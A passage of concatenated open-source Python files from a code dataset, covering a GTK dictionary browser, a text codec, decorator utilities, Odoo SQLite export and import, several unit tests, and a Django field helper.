# applications to override enough methods and produce a
# domain-specific browser provided the information is presented as a
# Python dictionary.
#
# Possible applications:
#
# - Windows registry browser
# - SPOOLSS printerdata browser
# - tdb file browser
#
from gtk import *
import string, re
class GtkDictBrowser:
    """Two-pane GTK browser for a Python dictionary.

    The left pane lists (optionally regex-filtered) keys; the right pane shows
    the value of the selected key, rendered through an optional chain of
    registered display functions.
    """

    def __init__(self, dict):
        # The dictionary being browsed.
        self.dict = dict

        # This variable stores a list of (regexp, function) used to
        # convert the raw value data to a displayable string.
        self.get_value_text_fns = []
        # Function converting a raw key to its display text (identity by default).
        self.get_key_text = lambda x: x

        # We can filter the list of keys displayed using a regex
        self.filter_regex = ""

    # Create and configure user interface widgets. A string argument is
    # used to set the window title.
    def build_ui(self, title):
        win = GtkWindow()
        win.set_title(title)
        win.connect("destroy", mainquit)

        # Horizontal split: key list on the left, value text on the right.
        hpaned = GtkHPaned()
        win.add(hpaned)
        hpaned.set_border_width(5)
        hpaned.show()

        vbox = GtkVBox()
        hpaned.add1(vbox)
        vbox.show()

        scrolled_win = GtkScrolledWindow()
        scrolled_win.set_policy(POLICY_AUTOMATIC, POLICY_AUTOMATIC)
        vbox.pack_start(scrolled_win)
        scrolled_win.show()

        # Filter entry row underneath the key list.
        hbox = GtkHBox()
        vbox.pack_end(hbox, expand = 0, padding = 5)
        hbox.show()

        label = GtkLabel("Filter:")
        hbox.pack_start(label, expand = 0, padding = 5)
        label.show()

        self.entry = GtkEntry()
        hbox.pack_end(self.entry, padding = 5)
        self.entry.show()

        self.entry.connect("activate", self.filter_activated)

        self.list = GtkList()
        self.list.set_selection_mode(SELECTION_MULTIPLE)
        self.list.set_selection_mode(SELECTION_BROWSE)
        scrolled_win.add_with_viewport(self.list)
        self.list.show()

        self.list.connect("select_child", self.key_selected)

        # Right pane: read-only text widget for the selected value.
        scrolled_win = GtkScrolledWindow()
        scrolled_win.set_policy(POLICY_AUTOMATIC, POLICY_AUTOMATIC)
        hpaned.add2(scrolled_win)
        scrolled_win.set_usize(500,400)
        scrolled_win.show()

        self.text = GtkText()
        self.text.set_editable(FALSE)
        scrolled_win.add_with_viewport(self.text)
        self.text.show()

        self.text.connect("event", self.event_handler)

        self.menu = GtkMenu()
        self.menu.show()

        # Fixed-width font keeps hex/ascii value dumps aligned.
        self.font = load_font("fixed")

        self.update_keylist()

        win.show()

    # Add a key to the left hand side of the user interface
    def add_key(self, key):
        display_key = self.get_key_text(key)
        list_item = GtkListItem(display_key)
        list_item.set_data("raw_key", key) # Store raw key in item data
        self.list.add(list_item)
        list_item.show()

    # Event handler registered by build_ui()
    def event_handler(self, event, menu):
        return FALSE

    # Set the text to appear in the right hand side of the user interface
    def set_value_text(self, item):

        # Clear old value in text window
        self.text.delete_text(0, self.text.get_length())

        if type(item) == str:
            # The text widget has trouble inserting text containing NULL
            # characters.
            item = string.replace(item, "\x00", ".")
            self.text.insert(self.font, None, None, item)
        else:
            # A non-text item
            self.text.insert(self.font, None, None, repr(item))

    # This function is called when a key is selected in the left hand side
    # of the user interface.
    def key_selected(self, list, list_item):
        key = list_item.children()[0].get()

        # Look for a match in the value display function list
        text = self.dict[list_item.get_data("raw_key")]

        for entry in self.get_value_text_fns:
            if re.match(entry[0], key):
                text = entry[1](text)
                break

        self.set_value_text(text)

    # Refresh the key list by removing all items and re-inserting them.
    # Items are only inserted if they pass through the filter regexp.
    def update_keylist(self):
        self.list.remove_items(self.list.children())
        self.set_value_text("")
        for k in self.dict.keys():
            if re.match(self.filter_regex, k):
                self.add_key(k)

    # Invoked when the user hits return in the filter text entry widget.
    def filter_activated(self, entry):
        self.filter_regex = entry.get_text()
        self.update_keylist()

    # Register a key display function
    def register_get_key_text_fn(self, fn):
        self.get_key_text = fn

    # Register a value display function
    def register_get_value_text_fn(self, regexp, fn):
        self.get_value_text_fns.append((regexp, fn))
#
# A utility function to convert a string to the standard hex + ascii format.
# To display all values in hex do:
# register_get_value_text_fn("", gtkdictbrowser.hex_string)
#
def hex_string(data):
    """Return a hex dump of a string as a string.

    The output produced is in the standard 16 characters per line hex +
    ascii format, e.g.:

    00000000: 40 00 00 00 00 00 00 00  40 00 00 00 01 00 04 80  @....... @.......
    00000010: 01 01 00 00 00 00 00 01  00 00 00 00              ........ ....
    """
    lines = []
    hex_part = ""
    ascii_part = ""

    for offset, char in enumerate(data):
        # Start a fresh line every 16 characters.
        if offset % 16 == 0:
            hex_part = "%08x: " % offset
            ascii_part = ""

        code = ord(char)
        hex_part = hex_part + "%02x " % code
        ascii_part = ascii_part + ("." if code < 32 or code > 176 else char)

        # Extra gap between the two groups of eight.
        if offset % 16 == 7:
            hex_part = hex_part + " "
            ascii_part = ascii_part + " "

        # Completed line of sixteen characters.
        if offset % 16 == 15:
            lines.append("%s %s\n" % (hex_part, ascii_part))

    # Flush a final partial line, padding the hex column out to full width.
    leftover = len(data) % 16
    if leftover:
        hex_part = hex_part + "   " * (16 - leftover)
        if leftover < 8:
            hex_part = hex_part + " "
        lines.append("%s %s\n" % (hex_part, ascii_part))

    return "".join(lines)
# For testing purposes, create a fixed dictionary to browse with
if __name__ == "__main__":
    dict = {"chicken": "ham", "spam": "fun", "subdict": {"a": "b", "c": "d"}}

    db = GtkDictBrowser(dict)
    db.build_ui("GtkDictBrowser")

    # Override Python's handling of ctrl-c so we can break out of the
    # gui from the command line.
    import signal
    signal.signal(signal.SIGINT, signal.SIG_DFL)

    mainloop()
| gpl-2.0 |
dut3062796s/PTVS | Python/Tests/TestData/VirtualEnv/env/Lib/encodings/big5hkscs.py | 61 | 1078 | #
# big5hkscs.py: Python Unicode Codec for BIG5HKSCS
#
# Written by Hye-Shik Chang <perky@FreeBSD.org>
#
import _codecs_hk, codecs
import _multibytecodec as mbc
# Shared low-level codec object from the C extension; used by all classes below.
codec = _codecs_hk.getcodec('big5hkscs')
class Codec(codecs.Codec):
    """Stateless big5hkscs encoder/decoder backed by the C implementation."""
    encode = codec.encode
    decode = codec.decode
class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,
                         codecs.IncrementalEncoder):
    """Incremental big5hkscs encoder; conversion is delegated to the C codec."""
    codec = codec
class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,
                         codecs.IncrementalDecoder):
    """Incremental big5hkscs decoder; conversion is delegated to the C codec."""
    codec = codec
class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):
    """Stream reader for big5hkscs; conversion is delegated to the C codec."""
    codec = codec
class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):
    """Stream writer for big5hkscs; conversion is delegated to the C codec."""
    codec = codec
def getregentry():
    """Return the CodecInfo entry used to register the 'big5hkscs' codec."""
    return codecs.CodecInfo(
        name='big5hkscs',
        encode=Codec().encode,
        decode=Codec().decode,
        incrementalencoder=IncrementalEncoder,
        incrementaldecoder=IncrementalDecoder,
        streamreader=StreamReader,
        streamwriter=StreamWriter,
    )
| apache-2.0 |
marscher/PyEMMA | pyemma/util/annotators.py | 1 | 8097 |
# This file is part of PyEMMA.
#
# Copyright (c) 2015, 2014 Computational Molecular Biology Group, Freie Universitaet Berlin (GER)
#
# PyEMMA is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from __future__ import absolute_import
import warnings
from decorator import decorator, decorate
from inspect import stack
from pyemma.util.exceptions import PyEMMA_DeprecationWarning
# Public API of this module (pyemma.util.annotators).
__all__ = ['alias',
           'aliased',
           'deprecated',
           'shortcut',
           'fix_docs',
           ]
def fix_docs(cls):
    """Class decorator: fill in missing docstrings of public members (methods,
    properties, attributes) from the first base class that documents them."""
    import inspect

    undocumented = [(name, member) for name, member in inspect.getmembers(cls)
                    if not name.startswith('_') and member.__doc__ is None]

    for name, member in undocumented:
        for base in cls.__mro__[1:]:
            inherited = getattr(base, name, None)
            doc = getattr(inherited, '__doc__', None) if inherited else None
            if not doc:
                continue
            if isinstance(member, property):
                # property.__doc__ is read-only, so rebuild the property with the inherited doc.
                setattr(cls, name, property(fget=member.fget, fset=member.fset,
                                            fdel=member.fdel, doc=doc))
            elif hasattr(member, '__func__'):
                # bound/class methods expose the writable doc on the underlying function.
                member.__func__.__doc__ = doc
            else:
                member.__doc__ = doc
            break
    return cls
class alias(object):
    """Decorator recording alternate names ("aliases") for a method.

    Must be used inside an @aliased-decorated class, which performs the actual
    binding.  For example, to make shout() also callable as yell() and
    scream():

        @alias('yell', 'scream')
        def shout(message):
            # ....
    """

    def __init__(self, *aliases):
        """Remember the requested alias names as a set."""
        self.aliases = set(aliases)

    def __call__(self, f):
        """Tag the decorated callable with the alias set and return it unchanged.

        Called once during decoration.  For a property, the tag goes on the
        getter, since property objects cannot carry arbitrary attributes.
        """
        target = f.fget if isinstance(f, property) else f
        target._aliases = self.aliases
        return f
def aliased(aliased_class):
    """Class decorator that installs the alias names recorded by @alias.

    Scans the class body for members carrying an ``_aliases`` attribute (set by
    the @alias decorator, either on the member itself or on a property's
    getter) and binds each alias name to the original member.  Names the class
    already defines are never overridden.

    Usage:

        @aliased
        class MyClass(object):
            @alias('coolMethod', 'myKinkyMethod')
            def boring_method(self):
                pass

            @property
            @alias('my_prop_alias')
            def my_prop(self):
                return "hi"

    After decoration, i.coolMethod() is equivalent to i.boring_method(), and
    i.my_prop_alias equals i.my_prop.
    """
    members = dict(aliased_class.__dict__)
    defined_names = set(members)

    for name, member in members.items():
        if isinstance(member, property):
            extra_names = getattr(member.fget, '_aliases', None)
        else:
            extra_names = getattr(member, '_aliases', None)

        if not extra_names:
            continue

        # Bind each alias, but never clobber a name the class already defines.
        for extra_name in extra_names - defined_names:
            setattr(aliased_class, extra_name, member)

    return aliased_class
def shortcut(*names):
    """Register module-level shortcuts (aliases) for a decorated function.

    Not for class methods -- use the aliased/alias decorators for those.  Each
    shortcut name is bound in the function's module globals, so calling the
    shortcut calls the decorated function, and the name is appended to the
    module's __all__ when one exists.  Since the shortcut is the very same
    function object, it shares the original's docstring.

    Examples
    --------
    In some module you have defined a function

    >>> @shortcut('is_tmatrix') # doctest: +SKIP
    >>> def is_transition_matrix(args): # doctest: +SKIP
    ...     pass # doctest: +SKIP

    Now you are able to call the function under its short name

    >>> is_tmatrix(args) # doctest: +SKIP
    """
    def wrap(f):
        module_globals = f.__globals__
        has_all = '__all__' in module_globals
        for name in names:
            module_globals[name] = f
            if has_all and name not in module_globals['__all__']:
                module_globals['__all__'].append(name)
        return f
    return wrap
def get_culprit(omit_top_frames=1):
    """get the filename and line number calling this.

    Parameters
    ----------
    omit_top_frames: int, default=1
        omit n frames from top of the stack. Purpose is to get the real
        culprit and not intermediate functions on the stack.

    Returns
    -------
    (filename: str, lineno: int)
        filename and line number of the culprit.
    """
    try:
        # Drop our own frame(s) so the first candidate is the interesting caller.
        caller_stack = stack()[omit_top_frames:]
        while len(caller_stack) > 0:
            frame = caller_stack.pop(0)
            filename = frame[1]
            # skip callee frames if they are other decorators or this file(func)
            if '<decorator' in filename or __file__ in filename:
                continue
            else:
                break
        # NOTE(review): if every frame matched the filter, 'frame' is still the
        # last popped entry; an initially empty stack would raise NameError here
        # -- presumably unreachable in practice, but worth confirming.
        lineno = frame[2]
        # avoid cyclic references!
        del caller_stack, frame
    except OSError: # eg. os.getcwd() fails in conda-test, since cwd gets deleted.
        filename = 'unknown'
        lineno = -1

    return filename, lineno
def deprecated(*optional_message):
    """This is a decorator which can be used to mark functions
    as deprecated. It will result in a warning being emitted
    when the function is used.

    Parameters
    ----------
    *optional_message : str
        an optional user level hint which should indicate which feature to use otherwise.

    """
    def _deprecated(func, *args, **kw):
        # 'msg' is a closure over the variable assigned below; that assignment
        # always happens before this wrapper can run, so the late binding is safe.
        filename, lineno = get_culprit()

        user_msg = 'Call to deprecated function "%s". Called from %s line %i. %s' \
                   % (func.__name__, filename, lineno, msg)

        # warn_explicit attributes the warning to the caller's file/line rather than ours.
        warnings.warn_explicit(
            user_msg,
            category=PyEMMA_DeprecationWarning,
            filename=filename,
            lineno=lineno
        )

        return func(*args, **kw)
    # add deprecation notice to func docstring:

    if len(optional_message) == 1 and callable(optional_message[0]):
        # this is the function itself, decorate!
        msg = ""
        return decorate(optional_message[0], _deprecated)
    else:
        # actually got a message (or empty parenthesis)
        msg = optional_message[0] if len(optional_message) > 0 else ""
        return decorator(_deprecated)
| lgpl-3.0 |
CLVsol/clvsol_odoo_api | hr_department_history.py | 1 | 7317 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
###############################################################################
#
# Copyright (C) 2013-Today Carlos Eduardo Vercelino - CLVsol
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
###############################################################################
from __future__ import print_function
import sqlite3
def hr_department_history_export_sqlite_10(client, args, db_path, table_name):
    """Dump hr.department.history records matching ``args`` into SQLite.

    The target ``table_name`` is dropped (if present) and recreated, then
    one row per server record is inserted.  The extra ``new_id`` column is
    left empty for a later import step to fill in.
    """
    connection = sqlite3.connect(db_path)
    connection.text_factory = str
    cursor = connection.cursor()
    # Start from a clean slate; a missing table is fine, just report it.
    try:
        cursor.execute('''DROP TABLE ''' + table_name + ''';''')
    except Exception as e:
        print('------->', e)
    cursor.execute(
        '''
        CREATE TABLE ''' + table_name + ''' (
            id INTEGER NOT NULL PRIMARY KEY,
            employee_id,
            department_id,
            sign_in_date,
            sign_out_date,
            history_marker_id,
            notes,
            active,
            new_id INTEGER
        );
        '''
    )
    # client.context = {'active_test': False}
    history_model = client.model('hr.department.history')
    exported = 0
    for record in history_model.browse(args):
        exported += 1
        print(exported, record.id,
              record.department_id.name.encode("utf-8"))
        # Falsy relational/char fields are stored as NULL.
        values = (
            record.id,
            record.employee_id.id if record.employee_id else None,
            record.department_id.id if record.department_id else None,
            record.sign_in_date if record.sign_in_date else None,
            record.sign_out_date if record.sign_out_date else None,
            record.history_marker_id.id if record.history_marker_id else None,
            record.notes if record.notes else None,
            record.active,
        )
        cursor.execute('''
            INSERT INTO ''' + table_name + '''(
                id,
                employee_id,
                department_id,
                sign_in_date,
                sign_out_date,
                history_marker_id,
                notes,
                active
            )
            VALUES(?,?,?,?,?,?,?,?)
            ''', values)
    connection.commit()
    connection.close()
    print()
    print('--> department_history_count: ', exported)
def hr_department_history_import_sqlite_10(
    client, args, db_path, table_name,
    hr_employee_table_name, hr_department_table_name, history_marker_table_name
):
    """Import hr.department.history rows from a local SQLite table into Odoo.

    For every row of ``table_name``, the referenced employee, department and
    history marker are resolved *by name*: the name is read from the
    companion SQLite tables, then looked up on the server to obtain the new
    id.  A fresh ``hr.department.history`` record is created and its server
    id is written back into the row's ``new_id`` column.

    Parameters
    ----------
    client : server proxy exposing ``model(name)`` (erppeek-style client)
    args : unused here -- presumably kept for signature symmetry with the
        export function; TODO confirm
    db_path : path of the SQLite database produced by the export step
    table_name : source table of exported history rows
    hr_employee_table_name, hr_department_table_name,
    history_marker_table_name : companion tables mapping old ids to names
    """
    department_history_model = client.model('hr.department.history')
    history_marker_model = client.model('clv.history_marker')
    hr_employee_model = client.model('hr.employee')
    hr_department_model = client.model('hr.department')
    conn = sqlite3.connect(db_path)
    conn.row_factory = sqlite3.Row
    # Two cursors: ``cursor`` streams the SELECT below while ``cursor2``
    # performs per-row lookups/updates without disturbing that iteration.
    cursor = conn.cursor()
    cursor2 = conn.cursor()
    department_history_count = 0
    data = cursor.execute(
        '''
        SELECT
            id,
            employee_id,
            department_id,
            sign_in_date,
            sign_out_date,
            history_marker_id,
            notes,
            active,
            new_id
        FROM ''' + table_name + ''';
        '''
    )
    print(data)
    print([field[0] for field in cursor.description])
    for row in cursor:
        department_history_count += 1
        print(department_history_count, row['id'], row['department_id'])
        new_history_marker_id = False
        cursor2.execute(
            '''
            SELECT name
            FROM ''' + history_marker_table_name + '''
            WHERE id = ?;''',
            (row['history_marker_id'],
             )
        )
        # NOTE(review): assumes the marker row always exists --
        # ``fetchone()[0]`` raises TypeError otherwise; the employee and
        # department lookups below are guarded, this one is not.  Confirm.
        history_marker_name = cursor2.fetchone()[0]
        history_marker_browse = history_marker_model.browse([('name', '=', history_marker_name), ])
        new_history_marker_id = history_marker_browse.id[0]
        employee_id = False
        cursor2.execute(
            '''
            SELECT name
            FROM ''' + hr_employee_table_name + '''
            WHERE id = ?;''',
            (row['employee_id'],
             )
        )
        employee_name = cursor2.fetchone()
        if employee_name is not None:
            employee_name = employee_name[0]
            # Resolve the server-side employee id by (assumed unique) name.
            hr_employee_browse = hr_employee_model.browse([('name', '=', employee_name), ])
            employee_id = hr_employee_browse.id[0]
        department_id = False
        cursor2.execute(
            '''
            SELECT name
            FROM ''' + hr_department_table_name + '''
            WHERE id = ?;''',
            (row['department_id'],
             )
        )
        department_name = cursor2.fetchone()
        if department_name is not None:
            department_name = department_name[0]
            # Resolve the server-side department id by (assumed unique) name.
            hr_department_browse = hr_department_model.browse([('name', '=', department_name), ])
            department_id = hr_department_browse.id[0]
        values = {
            'employee_id': employee_id,
            'department_id': department_id,
            'sign_in_date': row['sign_in_date'],
            'sign_out_date': row['sign_out_date'],
            'history_marker_id': new_history_marker_id,
            'notes': row['notes'],
            'active': row['active'],
        }
        department_history_id = department_history_model.create(values).id
        # Record the new server id so later steps can map old -> new.
        cursor2.execute(
            '''
            UPDATE ''' + table_name + '''
            SET new_id = ?
            WHERE id = ?;''',
            (department_history_id,
             row['id']
             )
        )
    conn.commit()
    conn.close()
    print()
    print('--> department_history_count: ', department_history_count)
| agpl-3.0 |
davidsminor/cortex | test/IECore/BoolVectorData.py | 12 | 2875 | ##########################################################################
#
# Copyright (c) 2007-2012, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# * Neither the name of Image Engine Design nor the names of any
# other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import math
import unittest
from IECore import *
import random
import os
class BoolVectorDataTest( unittest.TestCase ) :
	"""Unit tests for the IECore BoolVectorData vector type."""

	def test( self ) :
		# Randomised round-trip test: sized construction, default element
		# value, per-element assignment, copying, and serialisation through
		# an ObjectWriter/ObjectReader .cob round trip.
		trueFalse = [ True, False ]
		random.seed( 0 )
		for i in range( 0, 100 ) :
			s = random.randint( 0, 100 )
			b = BoolVectorData( s )
			# Sized constructor yields s elements, all defaulting to False.
			self.assertEqual( s, len( b ) )
			for j in range( 0, len( b ) ) :
				self.assertEqual( b[j], False )
				v = random.choice( trueFalse )
				b[j] = v
				self.assertEqual( b[j], v )
			# Copies compare equal, as does a file round trip.
			bb = b.copy()
			self.assertEqual( b, bb )
			ObjectWriter( b, "test/boolVector.cob" ).write()
			bbb = ObjectReader( "test/boolVector.cob" ).read()
			self.assertEqual( b, bbb )

	def testStrAndRepr( self ) :
		# str() joins elements with spaces; repr() is an eval-able constructor.
		self.assertEqual( str( BoolVectorData( [True, False] ) ), "1 0" )
		self.assertEqual( repr( BoolVectorData( [False, True] ) ), "IECore.BoolVectorData( [ 0, 1 ] )" )

	def testHasBase( self ) :
		self.failIf( BoolVectorData.hasBase() )

	def tearDown( self ) :
		# Remove the serialisation artefact written by test().
		if os.path.isfile( "test/boolVector.cob" ):
			os.remove( "test/boolVector.cob" )
# Allow running this test module directly from the command line.
if __name__ == "__main__":
	unittest.main()
| bsd-3-clause |
marinho/geraldo | site/newsite/django_1_0/django/db/models/fields/subclassing.py | 14 | 1819 | """
Convenience routines for creating non-trivial Field subclasses.
Add SubfieldBase as the __metaclass__ for your Field subclass, implement
to_python() and the other necessary methods and everything will work seamlessly.
"""
from django.utils.maxlength import LegacyMaxlength
class SubfieldBase(LegacyMaxlength):
    """
    A metaclass for custom Field subclasses. This ensures the model's attribute
    has the descriptor protocol attached to it.
    """
    def __new__(cls, base, name, attrs):
        # Build the field class normally, then replace contribute_to_class
        # with a wrapper that also installs the Creator descriptor on the
        # model, so assignments to the attribute go through to_python().
        new_class = super(SubfieldBase, cls).__new__(cls, base, name, attrs)
        new_class.contribute_to_class = make_contrib(
            attrs.get('contribute_to_class'))
        return new_class
class Creator(object):
    """Descriptor that pipes every assignment through the field's to_python().

    Installed on the model class under the field's name: reads come straight
    out of the instance ``__dict__`` while writes are converted first.
    """
    def __init__(self, field):
        self.field = field

    def __get__(self, obj, type=None):
        # Class-level access has no instance dict to read from.
        if obj is None:
            raise AttributeError('Can only be accessed via an instance.')
        return obj.__dict__[self.field.name]

    def __set__(self, obj, value):
        converted = self.field.to_python(value)
        obj.__dict__[self.field.name] = converted
def make_contrib(func=None):
    """
    Returns a suitable contribute_to_class() method for the Field subclass.

    If 'func' is passed in, it is the existing contribute_to_class() method on
    the subclass and it is called before anything else. It is assumed in this
    case that the existing contribute_to_class() calls all the necessary
    superclass methods.
    """
    def contribute_to_class(self, cls, name):
        if func:
            func(self, cls, name)
        else:
            # NOTE(review): ``super(self.__class__, self)`` resolves against
            # the *runtime* class; if the field class is subclassed again this
            # call can recurse infinitely -- confirm further subclassing is
            # not expected here.
            super(self.__class__, self).contribute_to_class(cls, name)
        # Install the conversion descriptor on the model under the field name.
        setattr(cls, self.name, Creator(self))
    return contribute_to_class
| lgpl-3.0 |
molmod/molmod | molmod/test/test_quaternions.py | 1 | 2233 | # -*- coding: utf-8 -*-
# MolMod is a collection of molecular modelling tools for python.
# Copyright (C) 2007 - 2019 Toon Verstraelen <Toon.Verstraelen@UGent.be>, Center
# for Molecular Modeling (CMM), Ghent University, Ghent, Belgium; all rights
# reserved unless otherwise stated.
#
# This file is part of MolMod.
#
# MolMod is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 3
# of the License, or (at your option) any later version.
#
# MolMod is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, see <http://www.gnu.org/licenses/>
#
# --
import unittest
import numpy as np
from molmod import *
__all__ = ["QuaternionTestCase"]
class QuaternionTestCase(unittest.TestCase):
    """Consistency checks for molmod's quaternion/rotation-matrix helpers."""

    def test_rotation_matrix(self):
        # Round trip: quaternion -> matrix -> quaternion -> matrix.
        quat = np.random.normal(0, 1, 4)
        quat /= np.linalg.norm(quat)
        mat = quaternion_to_rotation_matrix(quat)
        factor, quat_back = rotation_matrix_to_quaternion(mat)
        mat_back = quaternion_to_rotation_matrix(quat_back)
        # q and -q encode the same rotation, so accept either sign.
        assert (abs(quat - quat_back).max() < 1e-10) or (abs(quat + quat_back).max() < 1e-10)
        assert abs(mat - mat_back).max() < 1e-10

    def test_quaternion_rotation(self):
        # Rotating a point with the quaternion must match the matrix product.
        quat = np.random.normal(0, 1, 4)
        quat /= np.linalg.norm(quat)
        rot = quaternion_to_rotation_matrix(quat)
        point = np.random.normal(0, 1, 3)
        via_matrix = np.dot(rot, point)
        via_quaternion = quaternion_rotation(quat, point)
        assert abs(via_matrix - via_quaternion).max() < 1e-10

    def test_quaternion_product(self):
        # The quaternion product must correspond to composing the rotations.
        first = np.random.normal(0, 1, 4)
        first /= np.linalg.norm(first)
        second = np.random.normal(0, 1, 4)
        second /= np.linalg.norm(second)
        product = quaternion_product(first, second)
        rot_first = quaternion_to_rotation_matrix(first)
        rot_second = quaternion_to_rotation_matrix(second)
        rot_composed = np.dot(rot_first, rot_second)
        _factor, product_check = rotation_matrix_to_quaternion(rot_composed)
        # Again, both signs of the quaternion are acceptable.
        assert (abs(product - product_check).max() < 1e-10) or (abs(product + product_check).max() < 1e-10)
| gpl-3.0 |
mjirayu/sit_academy | lms/djangoapps/courseware/tests/test_split_module.py | 83 | 10524 | """
Test for split test XModule
"""
from django.core.urlresolvers import reverse
from mock import MagicMock
from nose.plugins.attrib import attr
from courseware.module_render import get_module_for_descriptor
from courseware.model_data import FieldDataCache
from student.tests.factories import UserFactory, CourseEnrollmentFactory
from xmodule.modulestore.tests.factories import ItemFactory, CourseFactory
from xmodule.modulestore.tests.django_utils import ModuleStoreTestCase
from xmodule.partitions.partitions import Group, UserPartition
from openedx.core.djangoapps.user_api.tests.factories import UserCourseTagFactory
@attr('shard_1')
class SplitTestBase(ModuleStoreTestCase):
    """
    Sets up a basic course and user for split test testing.
    Also provides tests of rendered HTML for two user_tag conditions, 0 and 1.

    Concrete subclasses set ``__test__ = True`` and fill in the class-level
    expectation tables below (one entry per experimental condition).
    """
    # Keep the test runner from collecting this abstract base directly.
    __test__ = False

    COURSE_NUMBER = 'split-test-base'
    # Expectation tables indexed by user_tag (0 or 1); set by subclasses.
    ICON_CLASSES = None     # css class of the sequence nav icon per condition
    TOOLTIPS = None         # substrings expected in the nav tooltips
    HIDDEN_CONTENT = None   # substrings that must NOT appear per condition
    VISIBLE_CONTENT = None  # substrings that must appear per condition

    def setUp(self):
        super(SplitTestBase, self).setUp()
        # Single user partition with two groups: alpha (0) and beta (1).
        self.partition = UserPartition(
            0,
            'first_partition',
            'First Partition',
            [
                Group(0, 'alpha'),
                Group(1, 'beta')
            ]
        )
        self.course = CourseFactory.create(
            number=self.COURSE_NUMBER,
            user_partitions=[self.partition]
        )
        self.chapter = ItemFactory.create(
            parent_location=self.course.location,
            category="chapter",
            display_name="test chapter",
        )
        self.sequential = ItemFactory.create(
            parent_location=self.chapter.location,
            category="sequential",
            display_name="Split Test Tests",
        )
        # Enrolled, logged-in student used for all rendering requests.
        self.student = UserFactory.create()
        CourseEnrollmentFactory.create(user=self.student, course_id=self.course.id)
        self.client.login(username=self.student.username, password='test')

    def _video(self, parent, group):
        """
        Returns a video component with parent ``parent``
        that is intended to be displayed to group ``group``.
        """
        return ItemFactory.create(
            parent_location=parent.location,
            category="video",
            display_name="Group {} Sees This Video".format(group),
        )

    def _problem(self, parent, group):
        """
        Returns a problem component with parent ``parent``
        that is intended to be displayed to group ``group``.
        """
        return ItemFactory.create(
            parent_location=parent.location,
            category="problem",
            display_name="Group {} Sees This Problem".format(group),
            data="<h1>No Problem Defined Yet!</h1>",
        )

    def _html(self, parent, group):
        """
        Returns an html component with parent ``parent``
        that is intended to be displayed to group ``group``.
        """
        return ItemFactory.create(
            parent_location=parent.location,
            category="html",
            display_name="Group {} Sees This HTML".format(group),
            data="Some HTML for group {}".format(group),
        )

    def test_split_test_0(self):
        self._check_split_test(0)

    def test_split_test_1(self):
        self._check_split_test(1)

    def _check_split_test(self, user_tag):
        """Checks that the right components are rendered for user with ``user_tag``"""
        # This explicitly sets the user_tag for self.student to ``user_tag``
        UserCourseTagFactory(
            user=self.student,
            course_id=self.course.id,
            key='xblock.partition_service.partition_{0}'.format(self.partition.id),
            value=str(user_tag)
        )
        # Render the courseware section as the student would see it.
        resp = self.client.get(reverse(
            'courseware_section',
            kwargs={'course_id': self.course.id.to_deprecated_string(),
                    'chapter': self.chapter.url_name,
                    'section': self.sequential.url_name}
        ))
        content = resp.content
        # Assert we see the proper icon in the top display
        self.assertIn('<a class="{} inactive progress-0"'.format(self.ICON_CLASSES[user_tag]), content)
        # And proper tooltips
        for tooltip in self.TOOLTIPS[user_tag]:
            self.assertIn(tooltip, content)
        # Content for the other condition must not leak through.
        for hidden in self.HIDDEN_CONTENT[user_tag]:
            self.assertNotIn(hidden, content)
        # Assert that we can see the data from the appropriate test condition
        for visible in self.VISIBLE_CONTENT[user_tag]:
            self.assertIn(visible, content)
class TestVertSplitTestVert(SplitTestBase):
    """
    Tests related to xmodule/split_test_module, with the split_test block
    nested inside an outer vertical.
    """
    __test__ = True

    COURSE_NUMBER = 'vert-split-vert'

    ICON_CLASSES = [
        'seq_problem',
        'seq_video',
    ]
    TOOLTIPS = [
